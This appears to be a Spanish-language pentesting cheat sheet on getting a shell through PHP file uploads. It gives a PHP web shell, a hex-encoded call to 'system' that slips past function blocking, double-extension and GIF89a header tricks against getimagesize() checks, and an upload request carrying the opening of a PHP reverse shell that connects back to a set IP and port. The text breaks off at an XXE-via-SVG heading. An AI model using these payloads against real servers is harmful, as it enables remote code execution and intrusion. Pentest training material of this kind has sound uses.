Si nos encontramos con un firewall que tiene bloqueadas las funciones como system(),exec(),exec_shell(), lo que podemos hacer es pasarlo a hexadecimal.
Ejemplo
<?php system("$_GET['cmd']"); ?>
Si pasamos system a hexadecimal, mediante un convertor:
Le añadimos una x delante de cada numero y un separador con \:
x73 | x79 | x73 | x74 | x65 | x6d
s y s t e m
<? php"\x73\x79\x73\x74\x65\x6d"("$_REQUEST['cmd']"); ?>
¿Cómo saber si un WAF tiene estás funciones no permitidas?
Tenemos que subir el archivo .php con lo siguiente phpinfo();
Al hacer la petición tendremos que ir a la sección Core --> Directive buscamos disable_functions.
PHP getimagesize()
Para los archivos que se suben que validan el archivo congetimagesize()es posible ejecutar una shell insertando el atributo comentario a la imagen y guardandolo como .png.php, si no funciona así prueba al revés .php.png.
También podemos probar de hace run bypass con el header de gif, subimos un gif le dejamos el header "GIF89a;", quitamos la info del gif y ponemos el monkey pentest o la shell.php.
Ejemplo
-----------------------------268587085338655749222889954885
Content-Disposition: form-data; name="file";
filename="giphy.php.gif"
Content-Type: image/gif
GIF89a; <-- este es el header necesario para bypasear
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.146.128';
$port = 4443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
File Upload into XXE
Podemos incluir XML malicioso cuando subimos una imagen SVG, cambiando el contenido de la imagen SVG, por los payloads de abajo:
